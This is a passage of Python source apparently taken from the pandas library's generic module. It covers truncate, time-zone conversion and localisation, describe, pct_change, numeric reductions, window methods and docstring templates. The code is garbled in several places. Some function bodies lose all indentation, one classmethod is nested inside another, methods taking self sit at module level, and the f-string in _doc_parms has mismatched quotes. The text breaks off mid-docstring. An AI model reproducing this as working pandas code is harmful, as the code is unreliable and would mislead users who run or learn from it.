    if axis is None:
        axis = self._stat_axis_number
    axis = self._get_axis_number(axis)
    ax = self._get_axis(axis)

    # GH 17935: positional truncation only makes sense on a sorted index.
    if not (ax.is_monotonic_increasing or ax.is_monotonic_decreasing):
        raise ValueError("truncate requires a sorted index")

    # Date-like axes accept string bounds; coerce them to Timestamps.
    # Everything else is treated as a plain label slice.
    if ax.is_all_dates:
        from pandas.core.tools.datetimes import to_datetime

        before = to_datetime(before)
        after = to_datetime(after)

    if before is not None and after is not None and before > after:
        raise ValueError(f"Truncate: {after} must be after {before}")

    slicer = [slice(None, None)] * self._AXIS_LEN
    slicer[axis] = slice(before, after)
    result = self.loc[tuple(slicer)]

    if isinstance(ax, MultiIndex):
        # Re-attach a properly truncated MultiIndex on the sliced axis.
        setattr(result, self._get_axis_name(axis), ax.truncate(before, after))

    return result.copy() if copy else result
def tz_convert(
    self: FrameOrSeries, tz, axis=0, level=None, copy: bool_t = True
) -> FrameOrSeries:
    """
    Convert tz-aware axis to target time zone.

    Parameters
    ----------
    tz : str or tzinfo object
    axis : the axis to convert
    level : int, str, default None
        If axis is a MultiIndex, convert a specific level. Otherwise
        must be None.
    copy : bool, default True
        Also make a copy of the underlying data.

    Returns
    -------
    %(klass)s
        Object with time zone converted axis.

    Raises
    ------
    TypeError
        If the axis is tz-naive.
    """
    axis = self._get_axis_number(axis)
    ax = self._get_axis(axis)

    def _convert(index, tz):
        # Indexes without tz support: an empty one is replaced by an empty
        # tz-aware DatetimeIndex, a non-empty one is an error.
        if hasattr(index, "tz_convert"):
            return index.tz_convert(tz)
        if len(index) == 0:
            return DatetimeIndex([], tz=tz)
        ax_name = self._get_axis_name(axis)
        raise TypeError(f"{ax_name} is not a valid DatetimeIndex or PeriodIndex")

    # If a level is given it must be a MultiIndex level or equivalent
    # to the axis name.
    if isinstance(ax, MultiIndex):
        level = ax._get_level_number(level)
        ax = ax.set_levels(_convert(ax.levels[level], tz), level=level)
    else:
        if level not in (None, 0, ax.name):
            raise ValueError(f"The level {level} is not valid")
        ax = _convert(ax, tz)

    result = self._constructor(self._data, copy=copy)
    result = result.set_axis(ax, axis=axis, inplace=False)
    return result.__finalize__(self)
def tz_localize(
    self: FrameOrSeries,
    tz,
    axis=0,
    level=None,
    copy: bool_t = True,
    ambiguous="raise",
    nonexistent: str = "raise",
) -> FrameOrSeries:
    """
    Localize tz-naive index of a Series or DataFrame to target time zone.

    This operation localizes the Index. To localize the values in a
    timezone-naive Series, use :meth:`Series.dt.tz_localize`.

    Parameters
    ----------
    tz : str or tzinfo
    axis : the axis to localize
    level : int, str, default None
        If axis ia a MultiIndex, localize a specific level. Otherwise
        must be None.
    copy : bool, default True
        Also make a copy of the underlying data.
    ambiguous : 'infer', bool-ndarray, 'NaT', default 'raise'
        How to handle times made ambiguous by a DST clock roll-back:
        'infer' attempts to infer the dst-transition order, a bool
        ndarray flags DST times explicitly, 'NaT' yields NaT and
        'raise' raises an AmbiguousTimeError.
    nonexistent : str, default 'raise'
        How to handle times skipped by a DST clock roll-forward:
        'shift_forward' / 'shift_backward' move to the closest existing
        time, 'NaT' yields NaT, a timedelta shifts by that amount and
        'raise' raises a NonExistentTimeError.

        .. versionadded:: 0.24.0

    Returns
    -------
    Series or DataFrame
        Same type as the input.

    Raises
    ------
    TypeError
        If the TimeSeries is tz-aware and tz is not None.

    Examples
    --------
    >>> s = pd.Series([1],
    ...               index=pd.DatetimeIndex(['2018-09-15 01:30:00']))
    >>> s.tz_localize('CET')
    2018-09-15 01:30:00+02:00    1
    dtype: int64
    """
    nonexistent_options = ("raise", "NaT", "shift_forward", "shift_backward")
    if nonexistent not in nonexistent_options and not isinstance(
        nonexistent, timedelta
    ):
        raise ValueError(
            "The nonexistent argument must be one of 'raise', "
            "'NaT', 'shift_forward', 'shift_backward' or "
            "a timedelta object"
        )

    axis = self._get_axis_number(axis)
    ax = self._get_axis(axis)

    def _localize(index, tz):
        # Indexes without tz support: an empty one is replaced by an empty
        # tz-aware DatetimeIndex, a non-empty one is an error.
        if hasattr(index, "tz_localize"):
            return index.tz_localize(tz, ambiguous=ambiguous, nonexistent=nonexistent)
        if len(index) == 0:
            return DatetimeIndex([], tz=tz)
        ax_name = self._get_axis_name(axis)
        raise TypeError(f"{ax_name} is not a valid DatetimeIndex or PeriodIndex")

    # If a level is given it must be a MultiIndex level or equivalent
    # to the axis name.
    if isinstance(ax, MultiIndex):
        level = ax._get_level_number(level)
        ax = ax.set_levels(_localize(ax.levels[level], tz), level=level)
    else:
        if level not in (None, 0, ax.name):
            raise ValueError(f"The level {level} is not valid")
        ax = _localize(ax, tz)

    result = self._constructor(self._data, copy=copy)
    result = result.set_axis(ax, axis=axis, inplace=False)
    return result.__finalize__(self)
# ----------------------------------------------------------------------
# Numeric Methods
def abs(self: FrameOrSeries) -> FrameOrSeries:
    """
    Return a Series/DataFrame with absolute numeric value of each element.

    This function only applies to elements that are all numeric.

    Returns
    -------
    abs
        Series/DataFrame containing the absolute value of each element.

    See Also
    --------
    numpy.absolute : Calculate the absolute value element-wise.

    Notes
    -----
    For ``complex`` inputs, ``1.2 + 1j``, the absolute value is
    :math:`\\sqrt{ a^2 + b^2 }`.

    Examples
    --------
    >>> pd.Series([-1.10, 2, -3.33, 4]).abs()
    0    1.10
    1    2.00
    2    3.33
    3    4.00
    dtype: float64

    >>> pd.Series([pd.Timedelta('1 days')]).abs()
    0   1 days
    dtype: timedelta64[ns]
    """
    # numpy dispatches this back through the pandas ufunc machinery,
    # preserving the container type.
    return np.abs(self)
def describe(
    self: FrameOrSeries, percentiles=None, include=None, exclude=None
) -> FrameOrSeries:
    """
    Generate descriptive statistics.

    Summarizes the central tendency, dispersion and shape of a dataset's
    distribution, excluding ``NaN`` values.  Analyzes numeric and object
    Series as well as DataFrame column sets of mixed data types; the
    output varies with what is provided.

    Parameters
    ----------
    percentiles : list-like of numbers, optional
        The percentiles to include in the output. All should fall
        between 0 and 1. The default is ``[.25, .5, .75]``.  The median
        (0.5) is always included.
    include : 'all', list-like of dtypes or None (default), optional
        A white list of data types to include in the result. Ignored
        for ``Series``.  ``'all'`` includes every column; a list-like of
        dtypes limits the result to those dtypes (``numpy.number``,
        ``'category'``, ``select_dtypes``-style strings, ...); ``None``
        keeps all numeric columns.
    exclude : list-like of dtypes or None (default), optional,
        A black list of data types to omit from the result. Ignored
        for ``Series``.  ``None`` excludes nothing.

    Returns
    -------
    Series or DataFrame
        Summary statistics of the Series or Dataframe provided.

    See Also
    --------
    DataFrame.count: Count number of non-NA/null observations.
    DataFrame.max: Maximum of the values in the object.
    DataFrame.min: Minimum of the values in the object.
    DataFrame.mean: Mean of the values.
    DataFrame.std: Standard deviation of the observations.
    DataFrame.select_dtypes: Subset of a DataFrame including/excluding
        columns based on their dtype.

    Notes
    -----
    Numeric data reports ``count``, ``mean``, ``std``, ``min``, ``max``
    and the requested percentiles.  Object data (e.g. strings or
    timestamps) reports ``count``, ``unique``, ``top`` and ``freq``;
    ties for ``top`` are broken arbitrarily.  For mixed data types in a
    ``DataFrame``, the default is to describe only the numeric columns;
    if there are none, all columns are described.

    Examples
    --------
    >>> pd.Series([1, 2, 3]).describe()
    count    3.0
    mean     2.0
    std      1.0
    min      1.0
    25%      1.5
    50%      2.0
    75%      2.5
    max      3.0
    dtype: float64
    """
    if self.ndim == 2 and self.columns.size == 0:
        raise ValueError("Cannot describe a DataFrame without columns")

    if percentiles is None:
        percentiles = np.array([0.25, 0.5, 0.75])
    else:
        # explicit conversion of `percentiles` to list
        percentiles = list(percentiles)
        # get them all to be in [0, 1]
        validate_percentile(percentiles)
        # median should always be included
        if 0.5 not in percentiles:
            percentiles.append(0.5)
        percentiles = np.asarray(percentiles)

    # sort and check for duplicates
    unique_pcts = np.unique(percentiles)
    if len(unique_pcts) < len(percentiles):
        raise ValueError("percentiles cannot contain duplicates")
    percentiles = unique_pcts

    formatted_percentiles = format_percentiles(percentiles)

    def _numeric_summary(series):
        labels = ["count", "mean", "std", "min"] + formatted_percentiles + ["max"]
        values = (
            [series.count(), series.mean(), series.std(), series.min()]
            + series.quantile(percentiles).tolist()
            + [series.max()]
        )
        return pd.Series(values, index=labels, name=series.name)

    def _categorical_summary(data):
        labels = ["count", "unique"]
        objcounts = data.value_counts()
        count_unique = len(objcounts[objcounts != 0])
        values = [data.count(), count_unique]
        dtype = None
        labels += ["top", "freq"]
        if count_unique > 0:
            values += [objcounts.index[0], objcounts.iloc[0]]
        else:
            # If the DataFrame is empty, set 'top' and 'freq' to NaN
            # to maintain output shape consistency.
            values += [np.nan, np.nan]
            dtype = "object"
        return pd.Series(values, index=labels, name=data.name, dtype=dtype)

    def _timestamp_summary(data):
        # GH-30164
        labels = ["count", "mean", "min"] + formatted_percentiles + ["max"]
        values = (
            [data.count(), data.mean(), data.min()]
            + data.quantile(percentiles).tolist()
            + [data.max()]
        )
        return pd.Series(values, index=labels, name=data.name)

    def _summarize(data):
        # Note: bools go through the categorical path, timedeltas
        # through the numeric one.
        if is_bool_dtype(data):
            return _categorical_summary(data)
        if is_numeric_dtype(data):
            return _numeric_summary(data)
        if is_datetime64_any_dtype(data):
            return _timestamp_summary(data)
        if is_timedelta64_dtype(data):
            return _numeric_summary(data)
        return _categorical_summary(data)

    if self.ndim == 1:
        return _summarize(self)

    if include is None and exclude is None:
        # when some numerics are found, keep only numerics
        data = self.select_dtypes(include=[np.number])
        if len(data.columns) == 0:
            data = self
    elif include == "all":
        if exclude is not None:
            raise ValueError("exclude must be None when include is 'all'")
        data = self
    else:
        data = self.select_dtypes(include=include, exclude=exclude)

    ldesc = [_summarize(col) for _, col in data.items()]

    # set a convenient order for rows: walk the per-column summaries from
    # shortest to longest so shared labels come first.
    names: List[Optional[Hashable]] = []
    for idxnames in sorted((x.index for x in ldesc), key=len):
        for name in idxnames:
            if name not in names:
                names.append(name)

    d = pd.concat([x.reindex(names, copy=False) for x in ldesc], axis=1, sort=False)
    d.columns = data.columns.copy()
    return d
_shared_docs[
"pct_change"
] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or str, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs["pct_change"] % _shared_doc_kwargs)
def pct_change(
self: FrameOrSeries,
periods=1,
fill_method="pad",
limit=None,
freq=None,
**kwargs,
) -> FrameOrSeries:
# TODO: Not sure if above is correct - need someone to confirm.
axis = self._get_axis_number(kwargs.pop("axis", self._stat_axis_name))
if fill_method is None:
data = self
else:
data = self._ensure_type(
self.fillna(method=fill_method, axis=axis, limit=limit)
)
rs = data.div(data.shift(periods=periods, freq=freq, axis=axis, **kwargs)) - 1
if freq is not None:
# Shift method is implemented differently when freq is not None
# We want to restore the original index
rs = rs.loc[~rs.index.duplicated()]
rs = rs.reindex_like(data)
return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
    # Apply the named reduction per index level via groupby.
    if axis is None:
        raise ValueError("Must specify 'axis' when aggregating by level.")
    grouped = self.groupby(level=level, axis=axis, sort=False)
    if skipna and hasattr(grouped, name):
        # Fast path: groupby implements this reduction natively.
        return getattr(grouped, name)(**kwargs)
    axis = self._get_axis_number(axis)
    method = getattr(type(self), name)
    # Slow path: apply the unbound method group by group.
    return grouped.aggregate(
        lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
    )
@classmethod
def _add_numeric_operations(cls):
    """
    Add the operations to the cls; evaluate the doc strings again
    """
    # axis_descr/name/name2 are interpolated into each generated docstring.
    axis_descr, name, name2 = _doc_parms(cls)
    # Boolean reductions.
    cls.any = _make_logical_function(
        cls,
        "any",
        name,
        name2,
        axis_descr,
        _any_desc,
        nanops.nanany,
        _any_see_also,
        _any_examples,
        empty_value=False,
    )
    cls.all = _make_logical_function(
        cls,
        "all",
        name,
        name2,
        axis_descr,
        _all_desc,
        nanops.nanall,
        _all_see_also,
        _all_examples,
        empty_value=True,
    )

    @Substitution(
        desc="Return the mean absolute deviation of the values "
        "for the requested axis.",
        name1=name,
        name2=name2,
        axis_descr=axis_descr,
        min_count="",
        see_also="",
        examples="",
    )
    @Appender(_num_doc_mad)
    def mad(self, axis=None, skipna=None, level=None):
        # Mean absolute deviation: mean(|x - mean(x)|) along ``axis``.
        if skipna is None:
            skipna = True
        if axis is None:
            axis = self._stat_axis_number
        if level is not None:
            # Per-level aggregation delegates to the groupby machinery.
            return self._agg_by_level("mad", axis=axis, level=level, skipna=skipna)
        data = self._get_numeric_data()
        if axis == 0:
            demeaned = data - data.mean(axis=0)
        else:
            # Row-wise: subtract the row means, aligned on the index.
            demeaned = data.sub(data.mean(axis=1), axis=0)
        return np.abs(demeaned).mean(axis=axis, skipna=skipna)

    cls.mad = mad

    # Dispersion statistics that take a ``ddof`` argument.
    cls.sem = _make_stat_function_ddof(
        cls,
        "sem",
        name,
        name2,
        axis_descr,
        "Return unbiased standard error of the mean over requested "
        "axis.\n\nNormalized by N-1 by default. This can be changed "
        "using the ddof argument",
        nanops.nansem,
    )
    cls.var = _make_stat_function_ddof(
        cls,
        "var",
        name,
        name2,
        axis_descr,
        "Return unbiased variance over requested axis.\n\nNormalized by "
        "N-1 by default. This can be changed using the ddof argument",
        nanops.nanvar,
    )
    cls.std = _make_stat_function_ddof(
        cls,
        "std",
        name,
        name2,
        axis_descr,
        "Return sample standard deviation over requested axis."
        "\n\nNormalized by N-1 by default. This can be changed using the "
        "ddof argument",
        nanops.nanstd,
    )

    # Cumulative accumulators. The two scalar arguments are the fill value
    # used to mask NAs during accumulation and the NA result value.
    cls.cummin = _make_cum_function(
        cls,
        "cummin",
        name,
        name2,
        axis_descr,
        "minimum",
        np.minimum.accumulate,
        "min",
        np.inf,
        np.nan,
        _cummin_examples,
    )
    cls.cumsum = _make_cum_function(
        cls,
        "cumsum",
        name,
        name2,
        axis_descr,
        "sum",
        np.cumsum,
        "sum",
        0.0,
        np.nan,
        _cumsum_examples,
    )
    cls.cumprod = _make_cum_function(
        cls,
        "cumprod",
        name,
        name2,
        axis_descr,
        "product",
        np.cumprod,
        "prod",
        1.0,
        np.nan,
        _cumprod_examples,
    )
    cls.cummax = _make_cum_function(
        cls,
        "cummax",
        name,
        name2,
        axis_descr,
        "maximum",
        np.maximum.accumulate,
        "max",
        -np.inf,
        np.nan,
        _cummax_examples,
    )

    # Reductions; sum/prod additionally support ``min_count``.
    cls.sum = _make_min_count_stat_function(
        cls,
        "sum",
        name,
        name2,
        axis_descr,
        """Return the sum of the values for the requested axis.\n
        This is equivalent to the method ``numpy.sum``.""",
        nanops.nansum,
        _stat_func_see_also,
        _sum_examples,
    )
    cls.mean = _make_stat_function(
        cls,
        "mean",
        name,
        name2,
        axis_descr,
        "Return the mean of the values for the requested axis.",
        nanops.nanmean,
    )
    cls.skew = _make_stat_function(
        cls,
        "skew",
        name,
        name2,
        axis_descr,
        "Return unbiased skew over requested axis.\n\nNormalized by N-1.",
        nanops.nanskew,
    )
    cls.kurt = _make_stat_function(
        cls,
        "kurt",
        name,
        name2,
        axis_descr,
        "Return unbiased kurtosis over requested axis.\n\n"
        "Kurtosis obtained using Fisher's definition of\n"
        "kurtosis (kurtosis of normal == 0.0). Normalized "
        "by N-1.",
        nanops.nankurt,
    )
    # ``kurtosis`` is an alias of ``kurt``.
    cls.kurtosis = cls.kurt
    cls.prod = _make_min_count_stat_function(
        cls,
        "prod",
        name,
        name2,
        axis_descr,
        "Return the product of the values for the requested axis.",
        nanops.nanprod,
        examples=_prod_examples,
    )
    # ``product`` is an alias of ``prod``.
    cls.product = cls.prod
    cls.median = _make_stat_function(
        cls,
        "median",
        name,
        name2,
        axis_descr,
        "Return the median of the values for the requested axis.",
        nanops.nanmedian,
    )
    cls.max = _make_stat_function(
        cls,
        "max",
        name,
        name2,
        axis_descr,
        """Return the maximum of the values for the requested axis.\n
        If you want the *index* of the maximum, use ``idxmax``. This is
        the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
        nanops.nanmax,
        _stat_func_see_also,
        _max_examples,
    )
    cls.min = _make_stat_function(
        cls,
        "min",
        name,
        name2,
        axis_descr,
        """Return the minimum of the values for the requested axis.\n
        If you want the *index* of the minimum, use ``idxmin``. This is
        the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
        nanops.nanmin,
        _stat_func_see_also,
        _min_examples,
    )
    @classmethod
    def _add_series_or_dataframe_operations(cls):
        """
        Add the series or dataframe only operations to the cls; evaluate
        the doc strings again.
        """
        # Imported locally to avoid a circular import with pandas.core.window.
        from pandas.core.window import EWM, Expanding, Rolling, Window

        @Appender(Rolling.__doc__)
        def rolling(
            self,
            window,
            min_periods=None,
            center=False,
            win_type=None,
            on=None,
            axis=0,
            closed=None,
        ):
            axis = self._get_axis_number(axis)
            # A window type (e.g. 'gaussian') selects the weighted Window
            # variant; otherwise a plain Rolling object is returned.
            if win_type is not None:
                return Window(
                    self,
                    window=window,
                    min_periods=min_periods,
                    center=center,
                    win_type=win_type,
                    on=on,
                    axis=axis,
                    closed=closed,
                )
            return Rolling(
                self,
                window=window,
                min_periods=min_periods,
                center=center,
                win_type=win_type,
                on=on,
                axis=axis,
                closed=closed,
            )

        cls.rolling = rolling

        @Appender(Expanding.__doc__)
        def expanding(self, min_periods=1, center=False, axis=0):
            axis = self._get_axis_number(axis)
            return Expanding(self, min_periods=min_periods, center=center, axis=axis)

        cls.expanding = expanding

        @Appender(EWM.__doc__)
        def ewm(
            self,
            com=None,
            span=None,
            halflife=None,
            alpha=None,
            min_periods=0,
            adjust=True,
            ignore_na=False,
            axis=0,
        ):
            axis = self._get_axis_number(axis)
            return EWM(
                self,
                com=com,
                span=span,
                halflife=halflife,
                alpha=alpha,
                min_periods=min_periods,
                adjust=adjust,
                ignore_na=ignore_na,
                axis=axis,
            )

        cls.ewm = ewm
@Appender(_shared_docs["transform"] % dict(axis="", **_shared_doc_kwargs))
def transform(self, func, *args, **kwargs):
result = self.agg(func, *args, **kwargs)
if is_scalar(result) or len(result) != len(self):
raise ValueError("transforms cannot produce aggregated results")
return result
# ----------------------------------------------------------------------
# Misc methods
_shared_docs[
"valid_index"
] = """
Return index for %(position)s non-NA/null value.
Returns
-------
scalar : type of index
Notes
-----
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
"""
def _find_valid_index(self, how: str):
"""
Retrieves the index of the first valid value.
Parameters
----------
how : {'first', 'last'}
Use this parameter to change between the first or last valid index.
Returns
-------
idx_first_valid : type of index
"""
idxpos = find_valid_index(self._values, how)
if idxpos is None:
return None
return self.index[idxpos]
    @Appender(
        _shared_docs["valid_index"] % {"position": "first", "klass": "Series/DataFrame"}
    )
    def first_valid_index(self):
        # Docstring is supplied by @Appender from the shared template.
        return self._find_valid_index("first")
    @Appender(
        _shared_docs["valid_index"] % {"position": "last", "klass": "Series/DataFrame"}
    )
    def last_valid_index(self):
        # Docstring is supplied by @Appender from the shared template.
        return self._find_valid_index("last")
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = (
f"{{{", ".join(f"{a} ({i})' for i, a in enumerate(cls._AXIS_ORDERS))}}}"
)
name = cls._constructor_sliced.__name__ if cls._AXIS_LEN > 1 else "scalar"
name2 = cls.__name__
return axis_descr, name, name2
# Shared docstring template for plain numeric reductions (sum/mean/min/...).
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
**kwargs
Additional keyword arguments to be passed to the function.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
# Variant of _num_doc used by ``mad`` (no numeric_only/min_count/kwargs).
_num_doc_mad = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default None
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
# Template for reductions taking a ``ddof`` argument (std/var/sem).
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
%(name1)s or %(name2)s (if level specified)\n"""
# Template for the boolean reductions ``any``/``all``.
_bool_doc = """
%(desc)s
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default 0
Indicate which axis or axes should be reduced.
* 0 / 'index' : reduce the index, return a Series whose index is the
original column labels.
* 1 / 'columns' : reduce the columns, return a Series whose index is the
original index.
* None : reduce all axes, return a scalar.
bool_only : bool, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
skipna : bool, default True
Exclude NA/null values. If the entire row/column is NA and skipna is
True, then the result will be %(empty_value)s, as for an empty row/column.
If skipna is False, then NA are treated as True, because these are not
equal to zero.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
If level is specified, then, %(name2)s is returned; otherwise, %(name1)s
is returned.
%(see_also)s
%(examples)s"""
# Description text substituted into _bool_doc for ``all``.
_all_desc = """\
Return whether all elements are True, potentially over an axis.
Returns True unless there at least one element within a series or
along a Dataframe axis that is False or equivalent (e.g. zero or
empty)."""
# Examples section substituted into _bool_doc for ``all``.
_all_examples = """\
Examples
--------
**Series**
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
>>> pd.Series([]).all()
True
>>> pd.Series([np.nan]).all()
True
>>> pd.Series([np.nan]).all(skipna=False)
True
**DataFrames**
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Specify ``axis='columns'`` to check if row-wise values all return True.
>>> df.all(axis='columns')
0 True
1 False
dtype: bool
Or ``axis=None`` for whether every value is True.
>>> df.all(axis=None)
False
"""
# See Also section substituted into _bool_doc for ``all``.
_all_see_also = """\
See Also
--------
Series.all : Return True if all elements are True.
DataFrame.any : Return True if one (or more) elements are True.
"""
# Template for the cumulative functions (cummin/cummax/cumsum/cumprod).
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
See Also
--------
core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
%(examples)s"""
# Examples section substituted into _cnum_doc for ``cummin``.
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
# Examples section substituted into _cnum_doc for ``cumsum``.
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
# Examples section substituted into _cnum_doc for ``cumprod``.
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
# Examples section substituted into _cnum_doc for ``cummax``.
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
